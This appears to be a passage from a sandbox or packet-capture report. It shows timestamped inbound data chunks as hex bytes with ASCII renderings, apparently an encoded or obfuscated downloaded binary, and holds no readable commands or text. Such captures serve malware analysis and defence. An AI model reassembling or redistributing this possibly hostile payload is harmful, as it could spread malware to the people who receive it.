                                                                                    2023-02-07 18:45:53 UTC878INData Raw: 88 67 d5 c2 2d 9e b6 10 11 01 00 00 ff ea d5 40 80 10 fb 30 58 7d 02 89 67 99 ce b5 7b cb 44 c3 c2 2d 9e b6 10 11 01 00 00 eb 2f fc 65 a1 88 73 8c ce bd 7b e3 10 8d 76 4d 9d 92 0a 96 de 67 6f 6f cc 81 a1 a0 a0 10 23 f6 4c cc b9 af d8 d6 51 5a dd fe 7d 5f bf 80 97 00 00 74 73 cb c5 cd c5 77 f4 75 7d 7b 85 48 2b b9 ad 03 00 cc f3 29 8c 64 01 00 89 fc 91 d7 f3 f9 81 d8 c9 a9 10 64 13 98 ba a1 67 43 f0 0d cd f0 00 00 72 99 66 c8 ad b8 07 a8 ea a9 3c 80 10 95 45 cf 8b ad 28 01 00 68 69 00 01 00 8d ce 5f 4a 06 b8 80 73 1b 00 33 e1 90 c1 47 c8 35 6c bd 61 f2 7f 8d fa 7f 03 89 7e f8 00 00 80 fd 93 ee 0f 8b 4b cf 00 00 8d f8 9a 65 84 8a 4d c6 8b 46 c2 00 00 0f b9 f0 b9 f0 b9 7f 20 4f a6 00 00 68 69 00 01 00 8d ce 5f 4a 06 b8 c9 3a 1b 00 8b c6 a9 67 47 c8 67 a2 f9
                                                                                    Data Ascii: g-@0X}g{D-/es{vMgoo#LQZ}_tswu}{H+)ddgCrf<E(hi_Js3G5la~KeMF Ohi_J:gGg
                                                                                    2023-02-07 18:45:53 UTC879INData Raw: f7 95 0c 7c c4 00 00 fe b2 4f 07 71 73 8d c6 45 29 50 75 8f c6 41 87 fa 79 83 c2 4d 8d c7 4a 8f c6 41 87 fa 75 8f c2 41 81 c7 46 83 fe 79 e7 e8 88 d6 55 8b fe 89 f4 75 7d 33 e1 d5 8b 04 80 00 00 8b c6 bd 7d 81 dd 5a d2 5d 8d c7 46 81 d7 5a 8d f8 75 8f c5 4a 8d f8 79 83 c5 4a 3f 75 46 7d 15 ea c6 4e 06 8c c5 42 f1 3f 42 79 da a8 c4 4e 06 77 56 a5 fd 72 0f 75 7b 85 41 71 bb 00 00 80 53 38 60 c6 45 01 10 a2 bb 00 00 80 0b 41 19 38 66 c9 fc fc 4d 11 f3 c2 a9 fd 72 0f 75 65 9d c7 aa 5b bb 00 00 80 53 38 60 c6 45 01 50 5d 89 c7 aa 5a ba 00 00 80 53 39 67 09 3c 7c c4 00 00 09 19 9b ce b9 75 8f 8f cd 74 cc 77 ce b5 0f f7 07 8a 76 f3 00 00 a1 e5 f2 b6 10 95 45 cf 8b 5c d8 00 00 8b 86 51 e5 b9 10 9b be a1 14 80 10 78 68 40 40 00 c1 20 ee 0c 4b 44 b7 bb 80 80 00 53
                                                                                    Data Ascii: |OqsE)PuAyMJAuAFyUu}3}Z]FZuJyJ?uF}NB?ByNwVru{AqS8`EA8fMrue[S8`EP]ZS9g<|utwvE\Qxh@@ KDS
                                                                                    2023-02-07 18:45:53 UTC881INData Raw: 00 8b fe 89 3d 3f fa 4a cd 7d c1 49 75 69 55 61 d5 c4 4b 3f 74 47 7d 37 c1 7d de 9b bb 00 00 80 f3 6a 92 45 1d 38 66 f9 72 02 f3 24 f2 7d cc d4 ba f0 7b 56 a8 c6 45 29 38 f2 f7 91 c3 ae 33 38 66 c1 4a 02 f3 24 f2 bd 0c 54 c4 00 00 fe f7 7c 73 8d c6 45 29 78 5d 8f d6 51 87 c4 47 83 fc 73 8d f8 75 8f fc 7f 83 c4 4b 8d f8 79 83 fe 65 13 76 89 75 fc 65 d1 3f fa 4a cd 7d c1 49 75 69 55 61 d5 c6 b9 79 81 fd 7a f2 7d 8d c2 43 81 f2 7f 8d d0 5d 8f c0 4f 8d d0 51 83 c0 4f 3f 70 43 7d 22 dd c6 4a 02 8c c5 42 f1 3f 42 7d de a8 c4 4a 02 77 6f 9c fd 72 0f 75 7b 85 45 71 bf 00 00 80 53 3c 64 c6 45 01 30 b4 c9 d4 d4 cf 45 25 cb a0 fd 72 0f 75 65 9d c3 ae 5f bf 00 00 80 53 3c 64 c6 45 01 70 7d 89 09 14 54 c4 00 00 8d c3 ae 5a ba 00 00 80 53 39 e3 19 9b ce 55 99 8a 8a cd
                                                                                    Data Ascii: =?J}IuiUaK?tG}7}jE8fr$}{VE)838fJ$T|sE)x]QGsuKyevue?J}IuiUayz}C]OQO?pC}"JB?B}Jworu{EqS<dE0E%rue_S<dEp}TZS9U
                                                                                    2023-02-07 18:45:53 UTC882INData Raw: 97 1e ea be 55 d1 b9 10 13 76 3e c8 45 c9 8c 65 16 79 fc 79 87 ce 4d 33 3e 55 e9 b9 10 67 40 5d 6e ec ef e5 1d 00 a6 d0 f4 81 03 8a 7d e0 96 85 04 00 a6 d0 cc a1 23 82 b9 02 01 00 00 17 b7 5f 00 00 8b d6 b9 df e4 ab 65 ee 8a 7d 5f 04 bb 51 b2 0b 00 83 47 c8 37 e4 aa 14 37 3c 62 f7 ca 51 d5 b1 10 ef ea 0d 98 80 10 9b 53 e3 e4 aa 39 75 04 55 de b6 10 64 47 65 be 36 36 17 00 a6 dc 45 cf 8a f7 8d 00 00 74 ce 55 2b fc c8 8b d4 af 00 00 38 c7 0c 0c 00 00 e9 ac ba 00 00 cc cc 74 fe 79 66 6e ec 45 4d 1f 00 a6 9a f8 e4 aa 78 86 ce 55 2b fc b3 72 c1 c7 0c 0c 00 00 8b 48 2b 3b 08 24 00 3c a9 7a 78 a0 5c 94 10 f8 69 5a 24 00 74 d6 55 8d 5e ae 7b f1 8a 79 e4 ec fa 01 00 a6 b0 25 cd 01 00 8b fe 79 89 73 83 79 5f bb fa c2 2f 00 a6 b0 5e b6 01 00 83 be 55 d1 b9 10 13 0c
                                                                                    Data Ascii: Uv>EeyyM3>Ug@]n}#_e}_QG77<bQS9uUdGe66EtU+8tyfnEMxU+rH+;$<zx\iZ$tU^{y%ysy_/^U
                                                                                    2023-02-07 18:45:53 UTC883INData Raw: a8 50 10 e0 a0 50 10 f8 b8 50 10 9b cf ca 6a 6d cd cb 6b 6f cf ca 66 61 cd cb 67 63 cf ca 62 65 cd cb 63 67 cf ca 7e 79 cd cb 7f 7b cf ca 7a 7d cd cb 7b 7f cf ca 76 71 cd cb 77 73 cf ca 72 75 cd cb 73 71 89 89 8d 00 00 00 03 f3 f3 fb 07 db b1 a1 65 51 10 9b 74 bb 15 51 10 5c 1d 51 10 48 09 51 10 7c 3d 51 10 9b ce 4d 56 01 96 0a 53 1a 8c 8e 8f 8c ce 4d 56 01 96 0a 53 1a 8c 8e 8f 8d cc 47 89 cf 46 8a ce 4d 56 01 96 0a 4e c4 49 8a 8c 8e 8f 8d cc 47 89 cf 46 8b cc 44 8a cf 45 89 ce 4d 56 01 96 0a 53 1d f9 45 cd 71 f1 45 c5 0b 30 c4 03 00 00 75 51 e5 28 eb 81 61 e1 80 7a f1 7a 7f f0 0e 56 59 03 db b1 45 82 52 10 9b 74 08 2e 26 db a9 0d d2 52 10 9d c4 49 8b 4c 7d b9 03 00 00 83 7a fd 76 7e 8f 63 e3 28 e3 37 db a1 51 85 51 10 ef db a9 5d 82 52 10 80 74 b5 51 10
                                                                                    Data Ascii: PPPjmkofagcbecg~y{z}{vqwsrusqeQtQ\QHQ|=QMVSMVSGFMVNIGFDEMVSEqE0uQ(azzVYERt.&RIL}zv~c(7QQ]RtQ
                                                                                    2023-02-07 18:45:53 UTC885INData Raw: d7 b9 63 00 00 00 00 bb 4e 7e 27 00 7c 47 d0 9f 4d 2d d6 b6 ff 50 3c 23 c8 86 71 8c 90 f3 32 52 5b e8 22 6e 70 46 0d 3a 8d c3 c0 8f 9a 64 84 86 82 48 04 7c f1 bf 77 4c 3a 86 c8 c0 8e 65 98 90 f0 24 14 27 00 95 48 7b d0 81 83 7a 1a 5f 87 f3 9f 01 05 98 96 de 67 bf 05 dd fe 7d 3b e8 e2 64 49 43 22 65 2b c8 86 65 29 64 51 79 67 21 f3 9f 01 05 06 9e f8 c8 87 73 8c f6 71 37 c0 8c 6c f3 65 55 27 00 95 7c 48 d7 b9 63 00 00 00 00 bb f7 c7 27 00 7c 47 d0 9f 4d 2d 3e ec 64 49 61 71 8c 96 f5 21 41 de 45 2b e8 a6 71 8c 96 f5 3a 52 fe 69 eb 74 4d b3 7a 85 80 82 80 48 02 78 f1 bf 6a 51 3a 86 18 f2 93 80 82 80 48 02 78 f1 bf 7c 47 3b 71 fa b2 59 61 9b d7 64 49 61 77 8a 90 23 c0 8e fe 08 fe 69 eb 8a 7a 84 ce 49 66 3a d8 d4 5a f9 a7 b1 91 87 00 00 77 96 f6 fb cb 27 00 95
                                                                                    Data Ascii: cN~'|GM-P<#q2R["npF:dH|wL:e$'H{z_g};dIC"e+e)dQyg!sq7leU'|Hc'|GM->dIaq!AE+q:RitMzHxjQ:Hx|G;qYadIaw#izIf:Zw'
                                                                                    2023-02-07 18:45:53 UTC886INData Raw: 3f 00 a6 07 9d 95 dd ff 50 2c 8d 73 82 0a f5 cd 4a 37 3e 29 87 ab 10 64 73 57 b8 31 19 3f 00 a6 d2 cd 56 2b 3e 35 9b ab 10 64 73 57 b8 2f 07 3f 00 a6 d2 cd 52 2f 3e 31 9f ab 10 64 73 57 b8 5d 75 3f 00 a6 d2 cd 5e 23 3e 3d 93 ab 10 64 73 57 b8 4b 63 3f 00 a6 d2 cd 5a 27 3e 39 97 ab 10 64 73 57 b8 79 51 3f 00 a6 d2 cd 66 1b 3e 45 eb ab 10 64 73 57 b8 97 bf 3f 00 a6 d2 fd 52 1f 0e 71 ef ab 10 64 73 51 be 85 ad 3f 00 a6 07 9d 0f 00 00 99 de 67 ba 65 f3 90 00 00 00 00 00 00 00 db de 59 81 c4 49 8a 88 08 ca b4 7d 8a 41 c3 0e a4 af 20 cf 1a 7a fe 7d 8b 4a 36 72 c4 49 83 42 c0 8b 8c 0c ca b4 7d 8a 45 c7 0e ac a7 20 57 9d 65 4a 42 47 e4 7e 97 0a 0f 00 00 00 00 00 00 00 00 00 47 df 70 20 8f c7 68 2c ff 35 c1 03 00 00 75 49 b7 89 38 3b 74 5b 24 ca b4 52 1c 5b 60 74
                                                                                    Data Ascii: ?P,sJ7>)dsW1?V+>5dsW/?R/>1dsW]u?^#>=dsWKc?Z'>9dsWyQ?f>EdsW?RqdsQ?geYI}A z}J6rIB}E WeJBG~Gp h,5uI8;t[$R[`t
                                                                                    2023-02-07 18:45:53 UTC887INData Raw: cf c8 87 1e ad c1 ca 00 cc 00 83 45 ce e3 f1 4a b8 81 80 16 00 c4 f8 9a 2d 7d ce c7 dd 00 dd 00 83 43 c8 83 7b 1b e9 31 c5 cd c8 87 35 be 8a 8d ae 01 a8 8a 81 0b 8a 79 f3 8a 7d f7 ea f9 6c 80 10 95 45 b4 56 1b 64 41 4f 00 26 71 57 00 b8 ed f9 8a 69 e3 8a 6d e7 8a 8d ae 05 ac 8a 55 df ea 91 04 80 10 99 cc bd ae be bc ac 07 00 a6 a6 8a 81 1c a3 b3 07 00 74 ce bd a1 b0 b0 58 01 00 39 64 55 81 d4 a9 7d d4 ad 85 7d 83 8d 8d cb 54 9d cc 4d 31 64 7d 55 7d 83 8d 8d cb 44 8d cc 65 df 8a 7d e0 2c cd 09 00 83 7b 07 a6 d0 cc a9 99 72 34 f3 29 c8 20 01 00 3b 7e 65 2f 8b 5f db 00 00 53 00 de c0 59 45 ae 8a 65 40 af 8a 55 c8 08 e9 09 00 83 47 dc 23 f8 4a cc b1 80 a0 5f be dd 68 80 10 43 00 ac 8a 61 44 af 8a 79 f3 8a 7d f7 29 ed f8 4a cc bd 8d 72 34 c5 1f 5e b7 00 00 7e
                                                                                    Data Ascii: EJ-}C{15y}lEVdAO&qWimUtX9dU}}TM1d}U}De},{r4) ;~e/_SYEe@UG#J_hCaDy})Jr4^~
                                                                                    2023-02-07 18:45:53 UTC889INData Raw: e4 91 65 10 ec 99 65 10 14 62 66 10 1c 6a 66 10 04 72 66 10 37 41 66 10 9b cf ca 92 95 cd cb 93 97 cf ca 96 91 cd cb 97 93 cf ca 9a 9d cd cb 9b 9f cf ca 9e 99 cd cb 9f 9b cf ca 82 85 cd cb 83 87 cf ca 86 81 cd cb 87 83 cf ca 8a 8d cd cb 8b 89 89 89 8d 00 00 00 03 f3 f3 fb 07 db b1 a5 56 66 10 9b 74 bf 26 66 10 58 2e 66 10 48 3e 66 10 7c 0a 66 10 9b ce 4d 56 01 96 0a 53 1a cc 45 8b cf 44 88 ce 4d 56 01 96 0a 4e c4 49 8a cc 45 8b cf 44 89 cc 44 8a cf 45 89 ce 4d 56 01 96 0a 53 1a cc 45 8b cf 44 89 cc 44 8a cf 45 88 cc 47 89 cf 46 8a ce 4d 56 01 96 0a 96 de 67 6f 6f e4 81 f4 81 75 fc 8d 73 fe 79 87 f6 75 83 c6 5d d1 28 ee ec ed 8b 16 9b 00 00 00 66 69 60 69 60 69 60 21 5e 76 69 60 39 76 46 69 60 31 6e 56 69 70 78 61 69 70 30 5f 76 69 70 28 77 46 69 70 20 6f
                                                                                    Data Ascii: eebfjfrf7AfVft&fX.fH>f|fMVSEDMVNIEDDEMVSEDDEGFMVgoousyu](fi`i`i`!^vi`9vFi`1nVipxaip0_vip(wFip o
                                                                                    2023-02-07 18:45:53 UTC890INData Raw: 02 41 c8 00 00 0f b8 b3 45 64 25 80 80 00 80 fd 81 fc 74 73 8c c6 b5 7b e2 11 8d 34 0a a9 60 60 6a ff 8b 50 28 e4 ff 12 05 00 83 47 c8 cf 96 de 67 6f 6f e0 ad a1 a0 a0 10 23 f6 4c cc b9 96 6c 8b c8 b1 a4 38 6c 14 10 00 ff 8a 7d ce 83 bf fa ff ea c9 5c 80 10 95 45 b5 70 86 4b 37 14 e1 87 c8 b1 a4 b8 5d 4a 00 00 a6 d2 c6 b1 cf fe 25 80 cc 5b 00 36 0a 96 de 67 6f 6f d8 95 a1 a0 a0 10 23 f6 4c cc b9 77 ce 55 9b c6 55 91 cc 9d 53 ce 51 47 da cc 95 5b 8b 56 df cc 99 57 ce 4d 5f 64 cc c4 7e 49 85 c4 81 45 f4 9d 69 f4 a9 db 8b db 5e 01 00 8b be 89 3c 80 10 9d c0 a5 b9 01 af 29 53 45 4b 96 c5 58 80 10 64 2a dd fe 95 e9 74 2d d5 c8 ad b8 af 8a 79 f3 29 53 45 b4 3f c8 fe 95 e9 74 30 ce fe a9 5f 7d 01 38 82 91 d5 01 00 00 75 79 f3 8a ad 30 59 53 1d 00 74 7b a9 1f 7d
                                                                                    Data Ascii: AEd%ts{4``jP(Ggoo#Ll8l}\EpK7]J%[6goo#LwUUSQG[VWM_d~IEi^<)SEKXd*t-y)SE?t0_}8uy0YSt{}
                                                                                    2023-02-07 18:45:53 UTC891INData Raw: 40 8d a5 10 fb ea 51 b8 59 4c 02 00 7c 47 d0 49 9e 0f 99 de 67 bb 01 05 d8 c6 5d 1b c2 bd 39 c6 fe 7d 83 f6 71 bb f6 f2 e9 ec 96 ad c4 49 8a ac 2c ee 6e 8d 73 53 2d ca b4 57 a0 45 c7 82 44 c6 3b dd 95 74 3c d9 94 75 00 e4 dc fd b5 74 3c f9 b4 75 00 c4 fc da 95 7e 88 6a e8 74 a4 e2 fa f3 da 94 7d b0 46 00 00 00 8d 70 f5 2e 52 4a 9a 05 01 96 0a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a dd cf 60 30 1f cb b5 5d a3 c7 68 34 9b cf 60 28 3f e1 25 06 7a 53 53 cf 60 2c ff 06 7a 7b 7b 48 34 93 40 34 9b 43 43 4d 31 93 40 34 13 d2 3a ac cc 43 43 d7 78 34 9b df 70 28 87 cf 60 2c d9 38 38 0a 0a 3b 3b 09 d3 c2 bc 81 03 04 78 7b 07 93 40 30 9f 43 43 cf 60 34 e7 11 e5 d2 a3 7c 35 6f 70 28 7b 7f 7a 7d 34 7f 60 2c 7e 7f 47 65 6f 60 34 0b 4f 70 30 27 e8 f0 6f 60 2c 13
                                                                                    Data Ascii: @QYL|GIg]9}qI,nsS-WED;t<ut<u~jt}Fp.RJ`0]h4`(?%zSS`,z{{H4@4CCM1@4:CCx4p(`,88;;x{@0CC`4|5op({z}4`,~Geo`4Op0'o`,
                                                                                    2023-02-07 18:45:53 UTC893INData Raw: 50 1c d0 ea fc 01 00 c4 fe 4c cd 60 3c 17 8b 4a ce 00 00 81 c5 60 68 0d 50 34 26 8e f9 50 60 ac 0d 18 02 00 7a 45 cf 8b 31 b5 00 00 8b cf 60 44 35 3d e8 80 00 00 6a 69 56 00 3d 68 00 00 80 d0 af 28 5c 73 7b 7c 00 f0 8b 10 94 00 00 55 02 a8 2c 58 7b 73 7d ff 88 e5 48 38 6e 0e 29 d8 c1 68 3c 49 3b 6e 89 d9 70 38 4e 05 a8 ab 70 08 a9 45 b4 12 ed cf 60 34 2b fe b1 6d 22 ce 81 61 2e fd b0 67 3c 07 1d ff c8 c7 83 60 38 1d 01 00 00 89 cd 60 34 9b c7 68 7c 63 f6 46 53 ac 4f 6e d8 d9 70 3c 4a 02 01 06 a8 ab 70 08 a9 45 b4 5e a1 ff 50 30 2f c8 86 57 1b 55 48 38 68 7f 80 c7 68 7c d3 5d 3e 0a 1e 03 00 74 c7 68 7c d3 4d 2e ef fa 02 00 74 cf 60 78 d5 b9 67 bf d3 c5 01 00 7c 47 c0 5f 04 01 6d f3 9d de 47 80 87 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 6f c0 7f 05 e8
                                                                                    Data Ascii: PL`<J`hP4&P`zE1`D5=jiV=h(\s{|U,X{s}H8n)h<I;np8NpE`4+m"a.g<`8`4h|cFSOnp<JpE^P0/WUH8hh|]>th|M.t`xg|G_mGOo
                                                                                    2023-02-07 18:45:53 UTC894INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    2023-02-07 18:45:53 UTC895INData Raw: 62 98 00 14 8d 99 00 22 bb 99 00 30 a9 99 00 3e a7 99 00 58 c1 99 00 68 f1 99 00 7e e7 99 00 98 01 99 00 a4 3d 99 00 bc 25 99 00 d4 4d 99 00 e4 7d 99 00 00 9a 9a 00 0c 96 9a 00 16 8c 9a 00 22 b8 9a 00 32 a8 9a 00 40 da 9a 00 4c d6 9a 00 58 c2 9a 00 6e f4 9a 00 80 1a 9a 00 92 08 9a 00 a4 3e 9a 00 b4 2e 9a 00 00 00 00 00 8c 1a 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 37 30 10 ea c4 3e 10 ff 88 67 10 ec 91 6d 10 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 74 ac 10 20 9d ad 10 53 2c 1d 37 3d 11 1d 24 22 1d 0c 06 16 00 73 00 6d 1e 10 0c 1d 17 00 4b 4a 08 00 6c 45 2b 0d 0c 0b 01 35 3f 06 07 1a 11 17 72 00 00 4b 0e 17 1c 0b 09 7f 01 1c 6a 08 00 4c 00 00 00 44 21 06 0c 0b 01 35 3f 06 07 1a 11 17 72 00 00
                                                                                    Data Ascii: b"0>Xh~=%M}"2@LXn>.70>gmt S,7=$"smKJlE+5?rKjLD!5?r
                                                                                    2023-02-07 18:45:53 UTC897INData Raw: 54 1c 1a 17 04 05 44 44 05 15 15 6c 07 0a 0d 07 5e 3c 01 1a 53 41 11 00 1c 05 0a 02 15 1d 06 01 4e 48 09 12 53 52 17 14 04 10 16 07 11 01 44 54 1c 0d 45 72 27 1b 1a 1d 04 08 45 54 1b 4f 54 11 17 1f 04 07 0f 15 11 45 49 1d 54 49 07 4e 41 0f 4e 55 1b 1b 06 06 14 0d 4c 57 16 18 57 24 5a 3c 09 04 12 16 45 43 0c 01 1a 15 02 17 54 54 1c 0d 45 41 11 00 1c 05 0a 02 15 1d 06 01 49 54 53 53 06 05 00 1f 1d 06 54 54 11 04 0c 4d 46 09 1d 52 4d 02 1d 17 45 49 07 08 09 1d 1f 0c 15 1d 06 01 40 23 07 0a 00 00 52 64 06 00 09 34 07 27 0d 4e 01 1b 54 45 0b 01 1a 12 0f 48 53 03 11 02 06 45 46 09 1d 52 45 0b 18 1f 1b 1d 01 03 08 0b 1a 79 07 0a 52 64 06 00 08 35 07 27 0d 4e 01 1b 54 45 0b 01 1a 12 0f 48 53 03 11 02 06 45 46 09 1d 52 41 13 15 12 18 08 0b 1a 07 7e 07 0a 00 00 52
                                                                                    Data Ascii: TDDl^<SANHSRDTEr'ETOTEITINANULWW$Z<ECTTEAITSSTTMFRMEI@#Rd4'NTEHSEFREyRd5'NTEHSEFRA~R
                                                                                    2023-02-07 18:45:53 UTC898INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 28 28 28 28 28 28 28 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 48 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 10 10 10 10 10 10 10 10 10 10 10 10 10 10 81 80 80 80 80 80 80 80 80 80 80 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: hh(((((((( HH
                                                                                    2023-02-07 18:45:53 UTC899INData Raw: 07 01 03 01 0f 01 03 01 07 01 03 01 b7 00 72 57 00 57 49 00 73 00 00 00 64 00 00 00 48 0c 6d 00 00 00 6d 44 00 48 0c 59 00 00 00 79 4d 00 62 4b 00 4b 56 00 79 00 00 00 50 1d 4d 00 41 0c 4d 00 44 21 06 06 08 0f 07 17 72 00 00 00 4e 21 19 13 08 0f 07 17 72 00 00 00 4f 2c 17 1b 0d 07 17 72 53 36 15 04 11 08 0f 07 17 72 00 00 41 34 12 12 06 07 74 00 4a 3f 19 15 79 00 00 00 4a 3f 1b 0b 65 00 00 00 41 31 02 1b 05 6c 00 00 4d 2c 13 11 0b 68 00 00 46 23 07 10 07 14 13 0b 79 00 00 00 4a 2b 0f 1b 14 13 0b 79 44 21 06 63 4e 21 19 76 4f 2c 17 74 53 36 15 70 41 34 12 67 4a 3f 19 6c 4a 3f 1b 6e 4d 2c 18 79 41 31 02 72 4d 2c 13 72 46 23 07 62 4a 2b 0f 6e 53 32 15 01 07 16 05 18 79 00 00 00 46 34 1b 0d 05 18 79 00 54 3c 1d 07 01 17 05 18 79 00 00 00 57 32 01 0a 0b 16 17
                                                                                    Data Ascii: rWWIsdHmmDHYyMbKKVyPMAMD!rN!rO,rS6rA4tJ?yJ?eA1lM,hF#yJ+yD!cN!vO,tS6pA4gJ?lJ?nM,yA1rM,rF#bJ+nS2yF4yT<yW2
                                                                                    2023-02-07 18:45:53 UTC901INData Raw: 8d 99 00 22 bb 99 00 30 a9 99 00 3e a7 99 00 58 c1 99 00 68 f1 99 00 7e e7 99 00 98 01 99 00 a4 3d 99 00 bc 25 99 00 d4 4d 99 00 e4 7d 99 00 00 9a 9a 00 0c 96 9a 00 16 8c 9a 00 22 b8 9a 00 32 a8 9a 00 40 da 9a 00 4c d6 9a 00 58 c2 9a 00 6e f4 9a 00 80 1a 9a 00 92 08 9a 00 a4 3e 9a 00 b4 2e 9a 00 00 00 00 00 8c 1a 96 00 00 00 00 00 55 57 4e 23 0e 05 28 25 0b 10 13 13 0b 2e 57 00 a0 a1 46 22 11 24 22 1d 0c 22 25 00 16 17 16 00 73 00 4b 0e 17 1c 0b 09 7f 01 1c 4a 08 00 6c 00 d8 da 75 04 03 02 1b 07 1a 12 31 57 55 06 16 17 61 01 1c 4a 08 00 6c 00 46 47 46 22 11 37 36 07 00 17 0b 1a 20 3c 1a 17 04 05 2d 2d 64 00 10 11 46 22 11 37 2c 02 00 0c 0f 0a 28 25 07 0b 24 41 16 14 4a 2d 04 11 36 34 17 00 65 00 e9 e8 46 22 11 22 33 17 01 1a 06 01 2b 3d 39 41 10 12 4a 2d
                                                                                    Data Ascii: "0>Xh~=%M}"2@LXn>.UWN#(%.WF"$""%sKJlu1WUaJlFGF"76 <--dF"7,(%$AJ-64eF""3+=9AJ-
                                                                                    2023-02-07 18:45:53 UTC902INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    2023-02-07 18:45:53 UTC903INData Raw: 00 92 92 00 c0 c8 08 00 00 00 00 00 00 93 93 00 c0 c8 08 00 00 00 00 00 00 03 03 00 00 07 07 00 00 78 78 00 00 0a 0a 00 00 02 02 00 00 e0 66 86 10 18 08 00 00 b4 32 86 10 19 09 00 00 88 0e 86 10 1a 0a 00 00 f0 75 85 10 00 10 00 00 c4 41 85 10 01 11 00 00 94 11 85 10 02 12 00 00 70 f5 85 10 03 13 00 00 44 c1 85 10 08 18 00 00 0c 89 85 10 09 19 00 00 e4 60 84 10 0a 1a 00 00 ac 28 84 10 0b 1b 00 00 74 f0 84 10 0c 1c 00 00 4c c8 84 10 0e 1e 00 00 2c a8 84 10 0f 1f 00 00 c8 4b 83 10 30 20 00 00 90 13 83 10 31 21 00 00 98 1a 82 10 32 22 00 00 f8 79 81 10 68 78 00 00 e8 69 81 10 69 79 00 00 d8 59 81 10 6a 7a 00 00 c8 49 81 10 ec fc 00 00 c4 45 81 10 ef ff 00 00 b4 35 81 10 10 00 00 00 01 01 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01
                                                                                    Data Ascii: xxf2uApD`(tL,K0 1!2"yhxiiyYjzIE5
                                                                                    2023-02-07 18:45:53 UTC905INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 03 01 07 01 03 01 0f 01 03 01 07 01 03 01 1f 01 03 01 07 01 03 01 0f 01 03 7a 00 00 00 00 00 41 03 01 07 01 03 01 0f 01 03 01 07 01 03 01 1f 01 03 01 07 01 03 01 0f 01 03 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: azAZ
